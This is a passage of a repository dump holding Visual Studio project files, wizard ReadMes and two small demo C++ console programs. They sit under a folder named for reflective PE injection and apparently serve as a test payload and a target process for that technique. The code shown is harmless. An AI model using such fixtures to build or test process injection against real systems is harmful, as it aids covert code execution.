13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="DemoExe_MD.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : DemoExe_MD Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this DemoExe_MD application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your DemoExe_MD application.
 9 | 
10 | 
11 | DemoExe_MD.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | DemoExe_MD.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | DemoExe_MD.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
 1 | // DemoExe.cpp : Defines the entry point for the console application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | #include <iostream>
 6 | 
 7 | using namespace std;
 8 | 
 9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | 	printf("Exe loaded! Printing argc and argv\n\n");
12 | 
13 | 	printf("Argc: %d\n", argc);
14 | 	printf("ArgvAddress: %d\n", argv);
15 | 	
16 | 	for (int i = 0; i < argc; i++)
17 | 	{
18 | 		wprintf(L"Argv: %s\n", argv[i]);
19 | 	}
20 | 
21 | 	printf("Exiting exe\n");
22 | 
23 | 	return 0;
24 | }
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|x64">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Release|Win32">
 13 |       <Configuration>Release</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>DemoExe_MDd</RootNamespace>
 25 |   </PropertyGroup>
 26 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 27 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 28 |     <ConfigurationType>Application</ConfigurationType>
 29 |     <UseDebugLibraries>true</UseDebugLibraries>
 30 |     <PlatformToolset>v110</PlatformToolset>
 31 |     <CharacterSet>Unicode</CharacterSet>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 34 |     <ConfigurationType>Application</ConfigurationType>
 35 |     <UseDebugLibraries>true</UseDebugLibraries>
 36 |     <PlatformToolset>v110</PlatformToolset>
 37 |     <CharacterSet>Unicode</CharacterSet>
 38 |   </PropertyGroup>
 39 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 40 |     <ConfigurationType>Application</ConfigurationType>
 41 |     <UseDebugLibraries>false</UseDebugLibraries>
 42 |     <PlatformToolset>v110</PlatformToolset>
 43 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 44 |     <CharacterSet>Unicode</CharacterSet>
 45 |   </PropertyGroup>
 46 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 47 |     <ConfigurationType>Application</ConfigurationType>
 48 |     <UseDebugLibraries>false</UseDebugLibraries>
 49 |     <PlatformToolset>v110</PlatformToolset>
 50 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 51 |     <CharacterSet>Unicode</CharacterSet>
 52 |   </PropertyGroup>
 53 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 54 |   <ImportGroup Label="ExtensionSettings">
 55 |   </ImportGroup>
 56 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 57 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 58 |   </ImportGroup>
 59 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 60 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <PropertyGroup Label="UserMacros" />
 69 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 70 |     <LinkIncremental>true</LinkIncremental>
 71 |   </PropertyGroup>
 72 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 73 |     <LinkIncremental>true</LinkIncremental>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 76 |     <LinkIncremental>false</LinkIncremental>
 77 |   </PropertyGroup>
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 79 |     <LinkIncremental>false</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 82 |     <ClCompile>
 83 |       <PrecompiledHeader>Use</PrecompiledHeader>
 84 |       <WarningLevel>Level3</WarningLevel>
 85 |       <Optimization>Disabled</Optimization>
 86 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 87 |       <SDLCheck>true</SDLCheck>
 88 |     </ClCompile>
 89 |     <Link>
 90 |       <SubSystem>Console</SubSystem>
 91 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 92 |     </Link>
 93 |   </ItemDefinitionGroup>
 94 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 95 |     <ClCompile>
 96 |       <PrecompiledHeader>Use</PrecompiledHeader>
 97 |       <WarningLevel>Level3</WarningLevel>
 98 |       <Optimization>Disabled</Optimization>
 99 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
100 |       <SDLCheck>true</SDLCheck>
101 |     </ClCompile>
102 |     <Link>
103 |       <SubSystem>Console</SubSystem>
104 |       <GenerateDebugInformation>true</GenerateDebugInformation>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |       <SDLCheck>true</SDLCheck>
116 |     </ClCompile>
117 |     <Link>
118 |       <SubSystem>Console</SubSystem>
119 |       <GenerateDebugInformation>true</GenerateDebugInformation>
120 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
121 |       <OptimizeReferences>true</OptimizeReferences>
122 |     </Link>
123 |   </ItemDefinitionGroup>
124 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
125 |     <ClCompile>
126 |       <WarningLevel>Level3</WarningLevel>
127 |       <PrecompiledHeader>Use</PrecompiledHeader>
128 |       <Optimization>MaxSpeed</Optimization>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <SDLCheck>true</SDLCheck>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <GenerateDebugInformation>true</GenerateDebugInformation>
137 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
138 |       <OptimizeReferences>true</OptimizeReferences>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <Text Include="ReadMe.txt" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClInclude Include="stdafx.h" />
146 |     <ClInclude Include="targetver.h" />
147 |   </ItemGroup>
148 |   <ItemGroup>
149 |     <ClCompile Include="DemoExe_MDd.cpp" />
150 |     <ClCompile Include="stdafx.cpp">
151 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
152 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
153 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
154 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
155 |     </ClCompile>
156 |   </ItemGroup>
157 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
158 |   <ImportGroup Label="ExtensionTargets">
159 |   </ImportGroup>
160 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="DemoExe_MDd.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : DemoExe_MDd Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this DemoExe_MDd application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your DemoExe_MDd application.
 9 | 
10 | 
11 | DemoExe_MDd.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | DemoExe_MDd.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | DemoExe_MDd.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Release|Win32 = Release|Win32
10 | 	EndGlobalSection
11 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | 		{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | 		{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | 		{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | 		{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | 	EndGlobalSection
17 | 	GlobalSection(SolutionProperties) = preSolution
18 | 		HideSolutionNode = FALSE
19 | 	EndGlobalSection
20 | EndGlobal
21 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
 1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | #include <stdio.h>
 6 | 
 7 | using namespace std;
 8 | 
 9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | 	printf("Press enter to close.\n");
12 | 	getchar();
13 | 	
14 | 	return 0;
15 | }
16 | 
17 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup Label="ProjectConfigurations">
 4 |     <ProjectConfiguration Include="Debug|Win32">
 5 |       <Configuration>Debug</Configuration>
 6 |       <Platform>Win32</Platform>
 7 |     </ProjectConfiguration>
 8 |     <ProjectConfiguration Include="Release|Win32">
 9 |       <Configuration>Release</Configuration>
10 |       <Platform>Win32</Platform>
11 |     </ProjectConfiguration>
12 |   </ItemGroup>
13 |   <PropertyGroup Label="Globals">
14 |     <ProjectGuid>{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}</ProjectGuid>
15 |     <Keyword>Win32Proj</Keyword>
16 |     <RootNamespace>ExeToInjectInTo</RootNamespace>
17 |   </PropertyGroup>
18 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
19 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
20 |     <ConfigurationType>Application</ConfigurationType>
21 |     <UseDebugLibraries>true</UseDebugLibraries>
22 |     <PlatformToolset>v110</PlatformToolset>
23 |     <CharacterSet>Unicode</CharacterSet>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
26 |     <ConfigurationType>Application</ConfigurationType>
27 |     <UseDebugLibraries>false</UseDebugLibraries>
28 |     <PlatformToolset>v110</PlatformToolset>
29 |     <WholeProgramOptimization>true</WholeProgramOptimization>
30 |     <CharacterSet>Unicode</CharacterSet>
31 |   </PropertyGroup>
32 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
33 |   <ImportGroup Label="ExtensionSettings">
34 |   </ImportGroup>
35 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
36 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
37 |   </ImportGroup>
38 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
39 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
40 |   </ImportGroup>
41 |   <PropertyGroup Label="UserMacros" />
42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
43 |     <LinkIncremental>true</LinkIncremental>
44 |   </PropertyGroup>
45 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
46 |     <LinkIncremental>false</LinkIncremental>
47 |   </PropertyGroup>
48 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
49 |     <ClCompile>
50 |       <PrecompiledHeader>Use</PrecompiledHeader>
51 |       <WarningLevel>Level3</WarningLevel>
52 |       <Optimization>Disabled</Optimization>
53 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
54 |       <SDLCheck>true</SDLCheck>
55 |     </ClCompile>
56 |     <Link>
57 |       <SubSystem>Console</SubSystem>
58 |       <GenerateDebugInformation>true</GenerateDebugInformation>
59 |     </Link>
60 |   </ItemDefinitionGroup>
61 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
62 |     <ClCompile>
63 |       <WarningLevel>Level3</WarningLevel>
64 |       <PrecompiledHeader>Use</PrecompiledHeader>
65 |       <Optimization>MaxSpeed</Optimization>
66 |       <FunctionLevelLinking>true</FunctionLevelLinking>
67 |       <IntrinsicFunctions>true</IntrinsicFunctions>
68 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
69 |       <SDLCheck>true</SDLCheck>
70 |     </ClCompile>
71 |     <Link>
72 |       <SubSystem>Console</SubSystem>
73 |       <GenerateDebugInformation>true</GenerateDebugInformation>
74 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
75 |       <OptimizeReferences>true</OptimizeReferences>
76 |     </Link>
77 |   </ItemDefinitionGroup>
78 |   <ItemGroup>
79 |     <Text Include="ReadMe.txt" />
80 |   </ItemGroup>
81 |   <ItemGroup>
82 |     <ClInclude Include="stdafx.h" />
83 |     <ClInclude Include="targetver.h" />
84 |   </ItemGroup>
85 |   <ItemGroup>
86 |     <ClCompile Include="ExeToInjectInTo.cpp" />
87 |     <ClCompile Include="stdafx.cpp">
88 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
89 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
90 |     </ClCompile>
91 |   </ItemGroup>
92 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
93 |   <ImportGroup Label="ExtensionTargets">
94 |   </ImportGroup>
95 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="ExeToInjectInTo.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : ExeToInjectInTo Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this ExeToInjectInTo application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your ExeToInjectInTo application.
 9 | 
10 | 
11 | ExeToInjectInTo.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | ExeToInjectInTo.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | ExeToInjectInTo.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
